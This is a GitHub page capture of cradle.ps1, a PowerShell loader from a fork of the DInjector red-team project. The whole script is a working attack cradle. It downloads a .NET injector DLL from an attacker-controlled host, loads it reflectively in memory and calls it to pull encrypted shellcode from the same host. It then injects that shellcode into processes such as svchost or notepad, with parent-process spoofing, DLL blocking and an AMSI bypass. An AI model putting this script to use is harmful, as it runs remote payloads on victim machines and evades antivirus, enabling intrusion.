forked from snovvcrash/DInjector
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcradle.ps1
61 lines (43 loc) · 1.52 KB
/
cradle.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# module name
$A = "currentthread"
# lhost
$B = "10.10.13.37"
# lport
$C = 80
# injector filename
$D = "DInjector.dll"
# encrypted shellcode filename
$E = "enc"
# password to decrypt the shellcode
$F = "Passw0rd!"
# path to the image of a newly spawned process to inject into (used in "remotethreadapc", "remotethreadcontext" and "processhollow")
$G = "C:\Windows\System32\svchost.exe"
# existing process name to inject into (used in "remotethread" and "remotethreadsuspended")
$H = "notepad"
# parent process name to spoof the original value (use "0" to disable PPID spoofing)
$I = "explorer"
# block 3rd-party DLLs ("True" / "False")
$J = "True"
# bypass AMSI ("True" / "False")
$K = "True"
# --------------------------------------------------------------------
$methods = @("remotethread", "remotethreadsuspended")
if ($methods.Contains($A)) {
$H = (Start-Process -WindowStyle Hidden -PassThru $H).Id
}
$methods = @("remotethreadapc", "remotethreadcontext", "processhollow")
if ($methods.Contains($A)) {
try {
$I = (Get-Process $I -ErrorAction Stop).Id
}
catch {
$I = 0
}
}
$cmd = "${A} /sc:http://${B}:${C}/${E} /password:${F} /image:${G} /pid:${H} /ppid:${I} /blockDlls:${J} /am51:${K}"
$data = (IWR -UseBasicParsing "http://${B}:${C}/${D}").Content
$assem = [System.Reflection.Assembly]::Load($data)
$flags = [Reflection.BindingFlags] "NonPublic,Static"
$class = $assem.GetType("DInjector.Detonator", $flags)
$entry = $class.GetMethod("Boom", $flags)
$entry.Invoke($null, (, $cmd.Split(" ")))